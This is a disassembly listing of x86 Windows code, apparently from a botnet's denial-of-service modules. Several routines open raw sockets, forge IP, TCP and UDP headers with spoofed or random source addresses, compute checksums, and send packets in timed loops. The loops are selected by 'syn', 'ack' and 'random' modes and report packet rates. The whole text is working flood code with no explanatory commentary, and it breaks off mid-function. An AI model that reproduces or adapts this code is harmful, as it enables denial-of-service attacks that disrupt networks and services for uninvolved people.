var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
push 1
pop ecx
and [ebp+var_88], 0
push 4
and [ebp+var_58], 0
pop esi
mov ebx, 0FFh
push 6
xor eax, eax
pop edx
lea edi, [ebp+var_54]
mov [ebp+var_84], ecx
mov [ebp+var_80], 2
mov [ebp+var_7C], esi
mov [ebp+var_78], edx
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 11h
mov [ebp+var_68], 16h
mov [ebp+var_64], 29h
mov [ebp+var_60], 3Ah
mov [ebp+var_5C], ebx
mov [ebp+var_50], eax
stosd
lea edi, [ebp+var_2C]
mov [ebp+var_4C], eax
mov [ebp+var_48], eax
mov [ebp+var_44], 2000h
mov [ebp+var_40], esi
mov [ebp+var_3C], edx
mov [ebp+var_38], 3FFFh
mov [ebp+var_34], ecx
mov [ebp+var_30], eax
mov [ebp+var_28], ecx
stosd
mov edi, 100h
push edi
call sub_41CFC5
pop ecx
mov [ebp+var_4], eax
push edi
push eax
call ds:dword_4CB668 ; gethostname
push [ebp+var_4]
call ds:dword_4CB6D8 ; gethostbyname
mov eax, [eax+0Ch]
push ebx
push 3
push 2
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
call ds:dword_4CB6D4 ; socket
lea ecx, [ebp+var_28]
push esi
push ecx
push 2
push 0
push eax
mov [ebp+var_4], eax
call ds:dword_4CB634 ; setsockopt
mov esi, 200h
push esi
call sub_41B4D5
mov edi, dword_4270A8
pop ecx
mov [ebp+var_8], eax
call edi ; GetTickCount
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
push 29Ah
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call ds:dword_4CB654 ; htons
mov [ebp+var_96], ax
loc_413D36: ; CODE XREF: sub_413C1B+1FC�j
call edi ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja loc_413E1C
call sub_41B8E2
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call sub_41B8E2
cdq
mov ecx, ebx
idiv ecx
mov [ebp+var_54], edx
call sub_41B8E2
cdq
mov ecx, 1FA4h
mov [ebp+var_24], 45h
idiv ecx
mov [ebp+var_23], 4
mov [ebp+var_2C], edx
call sub_41B8E2
mov [ebp+var_20], ax
call sub_41B8E2
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_50]
push eax
call ds:dword_4CB654 ; htons
push esi
mov [ebp+var_1E], ax
call ds:dword_4CB654 ; htons
mov [ebp+var_22], ax
mov [ebp+var_1C], bl
call sub_41B8E2
push 0Eh
cdq
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_1B], al
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
push eax
call sub_40AC69
mov [ebp+var_1A], ax
lea eax, [ebp+var_24]
push 14h
push eax
push [ebp+var_8]
call sub_41C310
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push esi
push [ebp+var_8]
push [ebp+var_4]
call ds:dword_4CB6B8 ; sendto
jmp loc_413D36
; ---------------------------------------------------------------------------
loc_413E1C: ; CODE XREF: sub_413C1B+12C�j
push [ebp+var_8]
call sub_41B0B1
pop ecx
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_413C1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E36 proc near ; DATA XREF: sub_401ACD+53E9�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, dword_4270A8
call edi ; GetTickCount
push eax
call sub_41B8D8
pop ecx
push 0FFh
push 3
push 2
call ds:dword_4CB6D4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_413EFF
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset unk_436574
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_413EDF
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409A73
add esp, 14h
loc_413EDF: ; CODE XREF: sub_413E36+84�j
lea eax, [ebp+var_440]
push eax
call sub_4151AD
push [ebp+var_BC]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_413EFF: ; CODE XREF: sub_413E36+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call ds:dword_4CB634 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_413F7D
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset unk_43653C
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_413F5D
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409A73
add esp, 14h
loc_413F5D: ; CODE XREF: sub_413E36+102�j
lea eax, [ebp+var_440]
push eax
call sub_4151AD
push [ebp+var_BC]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_413F7D: ; CODE XREF: sub_413E36+DF�j
lea eax, [ebp+var_23C]
push eax
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_413FED
lea eax, [ebp+var_440]
push offset unk_43651C
push eax
call sub_41B886
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_413FCD
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409A73
add esp, 14h
loc_413FCD: ; CODE XREF: sub_413E36+172�j
lea eax, [ebp+var_440]
push eax
call sub_4151AD
push [ebp+var_BC]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_413FED: ; CODE XREF: sub_413E36+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call ds:dword_4CB654 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call ds:dword_4CB694 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_414025: ; CODE XREF: sub_413E36+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_4142E9
push 28h
mov [ebp+var_2C], 45h
call ds:dword_4CB654 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_414098
call sub_41B8E2
mov esi, eax
shl esi, 8
call sub_41B8E2
add esi, eax
shl esi, 8
call sub_41B8E2
add esi, eax
shl esi, 8
call sub_41B8E2
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_4140AE
; ---------------------------------------------------------------------------
loc_414098: ; CODE XREF: sub_413E36+233�j
push [ebp+var_240]
call sub_40AC10
pop ecx
push eax
call ds:dword_4CB694 ; inet_addr
mov [ebp+var_20], eax
loc_4140AE: ; CODE XREF: sub_413E36+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_4140CC
call sub_41B8E2
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_4140D2
; ---------------------------------------------------------------------------
loc_4140CC: ; CODE XREF: sub_413E36+284�j
push [ebp+var_B8]
loc_4140D2: ; CODE XREF: sub_413E36+294�j
call ds:dword_4CB654 ; htons
mov [ebp+var_16], ax
call sub_41B8E2
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_4CB654 ; htons
push 12345678h
mov [ebp+var_18], ax
call ds:dword_4CB650 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_414122
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_41417E
; ---------------------------------------------------------------------------
loc_414122: ; CODE XREF: sub_413E36+2E1�j
lea eax, [ebp+var_1BC]
push offset aAck ; "ack"
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_414142
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_41417E
; ---------------------------------------------------------------------------
loc_414142: ; CODE XREF: sub_413E36+301�j
lea eax, [ebp+var_1BC]
push offset aRandom_0 ; "random"
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_41417E
call sub_41B8E2
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_41B8E2
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_41417E: ; CODE XREF: sub_413E36+2EA�j
; sub_413E36+30A�j ...
push 200h
mov [ebp+var_C], 50h
call ds:dword_4CB654 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call ds:dword_4CB654 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41C310
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_41C310
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40AC69
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41C310
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_41C310
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_41B590
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40AC69
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41C310
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call ds:dword_4CB6B8 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_41426B
inc [ebp+arg_0]
jmp loc_414025
; ---------------------------------------------------------------------------
loc_41426B: ; CODE XREF: sub_413E36+42B�j
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset unk_4364CC
lea eax, [ebp+var_440]
push 200h
push eax
call sub_41B980
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_4142C9
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409A73
add esp, 14h
loc_4142C9: ; CODE XREF: sub_413E36+46E�j
lea eax, [ebp+var_440]
push eax
call sub_4151AD
push [ebp+var_BC]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_4142E9: ; CODE XREF: sub_413E36+203�j
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset unk_43647C
push eax
call sub_41B886
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_41435A
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409A73
add esp, 14h
loc_41435A: ; CODE XREF: sub_413E36+4FF�j
lea eax, [ebp+var_440]
push eax
call sub_4151AD
push [ebp+var_BC]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
sub_413E36 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41437A proc near ; CODE XREF: sub_414484+19A�p
; sub_414484+1A9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp eax, 1
mov [ebp+arg_4], esi
jle short loc_4143A6
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_414398: ; CODE XREF: sub_41437A+26�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_414398
pop edi
cmp eax, 1
loc_4143A6: ; CODE XREF: sub_41437A+12�j
jnz short loc_4143B3
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_4143B3: ; CODE XREF: sub_41437A:loc_4143A6�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop ebp
retn
sub_41437A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143CC proc near ; DATA XREF: sub_401ACD+6D4A�o
var_394 = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+var_110]
push eax
call sub_41B779
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call ds:dword_4CB694 ; inet_addr
push eax
lea esi, [ebp+var_194]
sub esp, 194h
push 65h
pop ecx
mov edi, esp
rep movsd
call sub_414484
add esp, 19Ch
push eax
lea eax, [ebp+var_394]
push offset unk_4365A8
push eax
call sub_41B886
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414467
push esi
lea eax, [ebp+var_394]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_194]
call sub_409A73
add esp, 14h
loc_414467: ; CODE XREF: sub_4143CC+79�j
lea eax, [ebp+var_394]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
sub_4143CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414484 proc near ; CODE XREF: sub_4143CC+54�p
var_CC = byte ptr -0CCh
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_A2 = word ptr -0A2h
var_A0 = byte ptr -0A0h
var_8C = byte ptr -8Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0CCh
push ebx
push esi
mov esi, dword_4270A8
xor ebx, ebx
push edi
mov [ebp+var_4], ebx
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_10], eax
call ds:dword_4CB6D4 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax
call sub_41B8D8
pop ecx
mov edi, 578h
push edi
push 9
push 1
call sub_418685
pop ecx
pop ecx
push eax
lea eax, [ebp+var_28]
push eax
call sub_41B590
add esp, 0Ch
mov esi, 5A0h
loc_4144DE: ; CODE XREF: sub_414484+235�j
call dword_4270A8 ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_4146BE
cmp ds:dword_4CEE08, ebx
jnz short loc_41455D
push 10h
pop eax
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_68]
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_68]
push eax
push [ebp+arg_0]
call ds:dword_4CB5F8 ; getsockname
push 0FFh
push 1
call sub_418685
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_62]
push eax
movzx eax, [ebp+var_63]
push eax
movzx eax, [ebp+var_64]
push eax
lea eax, [ebp+var_CC]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_41B886
add esp, 18h
jmp short loc_414570
; ---------------------------------------------------------------------------
loc_41455D: ; CODE XREF: sub_414484+7E�j
lea eax, [ebp+var_CC]
push offset dword_4CE7E8
push eax
call sub_41BEB0
pop ecx
pop ecx
loc_414570: ; CODE XREF: sub_414484+D7�j
lea eax, [ebp+var_CC]
push eax
call ds:dword_4CB694 ; inet_addr
mov [ebp+var_C], eax
mov eax, [ebp+var_58]
and al, 45h
push esi
or al, 45h
mov [ebp+var_54], 10h
mov [ebp+var_58], eax
call ds:dword_4CB654 ; htons
mov [ebp+var_52], ax
call sub_41B8E2
mov [ebp+var_50], ax
mov eax, [ebp+var_C]
mov [ebp+var_48], eax
mov eax, [ebp+arg_194]
mov [ebp+var_4E], 40h
mov [ebp+var_4C], 40h
mov [ebp+var_4B], 6
mov [ebp+var_4A], bx
mov [ebp+var_44], eax
call sub_41B8E2
mov [ebp+var_40], ax
call sub_41B8E2
mov [ebp+var_3E], ax
call sub_41B8E2
mov [ebp+var_3C], eax
call sub_41B8E2
mov [ebp+var_38], eax
mov eax, [ebp+var_34]
and ax, 0FF50h
push 14h
or al, 50h
mov byte ptr [ebp+var_34+2], 18h
mov word ptr [ebp+var_34], ax
mov ax, [ebp+var_3E]
mov [ebp+var_76], ax
mov eax, [ebp+var_44]
mov [ebp+var_74], eax
lea eax, [ebp+var_58]
push eax
mov [ebp+var_30], 787Dh
mov [ebp+var_2E], bx
mov [ebp+var_2C], bx
mov [ebp+var_78], 2
call sub_41437A
mov [ebp+var_4A], ax
lea eax, [ebp+var_58]
push 28h
push eax
call sub_41437A
mov eax, [ebp+var_48]
add esp, 10h
mov [ebp+var_AC], eax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], bl
mov [ebp+var_A3], 6
call dword_427210 ; htons
mov [ebp+var_A2], ax
lea eax, [ebp+var_A0]
push 14h
push eax
lea eax, [ebp+var_40]
push eax
call sub_41C310
lea eax, [ebp+var_8C]
push edi
push eax
lea eax, [ebp+var_28]
push eax
call sub_41C310
lea eax, [ebp+var_AC]
push 598h
push eax
call sub_41437A
add esp, 20h
mov [ebp+var_2E], ax
push 10h
lea eax, [ebp+var_78]
push eax
push ebx
lea eax, [ebp+var_58]
push esi
push eax
push [ebp+var_8]
call ds:dword_4CB6B8 ; sendto
inc [ebp+var_4]
jmp loc_4144DE
; ---------------------------------------------------------------------------
loc_4146BE: ; CODE XREF: sub_414484+72�j
push [ebp+var_8]
call ds:dword_4CB6EC ; closesocket
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_414484 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4146CF proc near ; DATA XREF: sub_401ACD+4CC0�o
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+arg_0]
push esi
mov eax, 85h
push edi
mov ecx, eax
mov esi, edx
lea edi, [ebp+var_214]
sub esp, 214h
rep movsd
mov ecx, eax
lea esi, [ebp+var_214]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_414746
add esp, 214h
push eax
lea eax, [ebp+var_414]
push offset unk_4365DC
push eax
call sub_41B886
lea eax, [ebp+var_414]
push eax
call sub_4151AD
push [ebp+var_10]
call sub_40B413
add esp, 14h
push 0
call dword_4270CC ; ExitThread
sub_4146CF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414746 proc near ; CODE XREF: sub_4146CF+3B�p
var_254 = byte ptr -254h
var_54 = byte ptr -54h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
arg_104 = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
mov ebx, 0FFh
push edi
push ebx
push 3
push 2
call ds:dword_4CB6D4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_414784
lea eax, [ebp+var_254]
push offset unk_4367CC
push eax
call sub_41B886
pop ecx
xor edi, edi
pop ecx
jmp loc_414A4D
; ---------------------------------------------------------------------------
loc_414784: ; CODE XREF: sub_414746+22�j
lea ecx, [ebp+var_14]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_14], 1
call ds:dword_4CB634 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_4147B0
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
push offset unk_43677C
jmp short loc_4147CB
; ---------------------------------------------------------------------------
loc_4147B0: ; CODE XREF: sub_414746+5A�j
lea eax, [ebp+arg_4]
push eax
call ds:dword_4CB694 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4147DF
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
push offset unk_436738
loc_4147CB: ; CODE XREF: sub_414746+68�j
lea eax, [ebp+var_254]
push eax
call sub_41B886
add esp, 0Ch
jmp loc_414A4D
; ---------------------------------------------------------------------------
loc_4147DF: ; CODE XREF: sub_414746+77�j
push edi
mov [ebp+var_24], 2
call ds:dword_4CB654 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call dword_42720C ; inet_addr
mov esi, dword_4270A8
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_43670C
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_414848
push edi
lea eax, [ebp+var_254]
push [ebp+arg_208]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_409A73
add esp, 14h
loc_414848: ; CODE XREF: sub_414746+E0�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+arg_104]
push eax
call sub_41B779
cmp esi, eax
pop ecx
ja loc_414A03
mov esi, 41Ch
jmp short loc_41487C
; ---------------------------------------------------------------------------
loc_414877: ; CODE XREF: sub_414746+2B7�j
mov ebx, 0FFh
loc_41487C: ; CODE XREF: sub_414746+12F�j
cmp ds:dword_4CEE08, edi
jnz short loc_4148D6
push 10h
pop eax
mov [ebp+var_10], eax
push eax
lea eax, [ebp+var_34]
push edi
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call ds:dword_4CB5F8 ; getsockname
push ebx
push 1
call sub_418685
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_41B886
add esp, 18h
jmp short loc_4148E6
; ---------------------------------------------------------------------------
loc_4148D6: ; CODE XREF: sub_414746+13C�j
lea eax, [ebp+var_54]
push offset dword_4CE7E8
push eax
call sub_41BEB0
pop ecx
pop ecx
loc_4148E6: ; CODE XREF: sub_414746+18E�j
push esi
mov ds:byte_4CE9E8, 45h
call ds:dword_4CB654 ; htons
mov ds:word_4CE9EA, ax
lea eax, [ebp+var_54]
push eax
mov ds:word_4CE9EC, 1
mov ds:word_4CE9EE, di
mov ds:byte_4CE9F0, 80h
mov ds:byte_4CE9F1, 11h
mov ds:word_4CE9F2, di
call ds:dword_4CB694 ; inet_addr
mov ds:dword_4CE9F4, eax
mov eax, [ebp+var_20]
mov ds:dword_4CE9F8, eax
lea eax, [ebp+arg_84]
push eax
mov ds:word_4CEA02, di
call sub_41B779
test eax, eax
pop ecx
jnz short loc_41495E
call sub_41B8E2
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_41496C
; ---------------------------------------------------------------------------
loc_41495E: ; CODE XREF: sub_414746+206�j
lea eax, [ebp+arg_84]
push eax
call sub_41B779
pop ecx
push eax
loc_41496C: ; CODE XREF: sub_414746+216�j
call ds:dword_4CB654 ; htons
mov ds:word_4CE9FE, ax
call sub_41B8E2
cdq
mov ecx, 401h
push 408h
idiv ecx
mov ds:word_4CE9FC, dx
call ds:dword_4CB654 ; htons
push 400h
mov ds:word_4CEA00, ax
call sub_41B8E2
cdq
idiv ebx
push edx
push offset dword_4CEA04
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_24]
push 10h
push eax
push edi
push esi
push offset byte_4CE9E8
push [ebp+var_C]
call ds:dword_4CB6B8 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_414A7C
inc [ebp+var_4]
call dword_4270A8 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+arg_104]
push eax
call sub_41B779
cmp ebx, eax
pop ecx
jbe loc_414877
loc_414A03: ; CODE XREF: sub_414746+124�j
push [ebp+var_C]
call ds:dword_4CB6EC ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+arg_104]
push eax
imul esi, 41Ch
call sub_41B779
pop ecx
xor edx, edx
mov ecx, eax
mov eax, esi
shr eax, 0Ah
div ecx
shr esi, 14h
push eax
push esi
push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
push offset unk_4366A8
loc_414A3E: ; CODE XREF: sub_414746+34A�j
lea eax, [ebp+var_254]
push eax
call sub_41B886
add esp, 18h
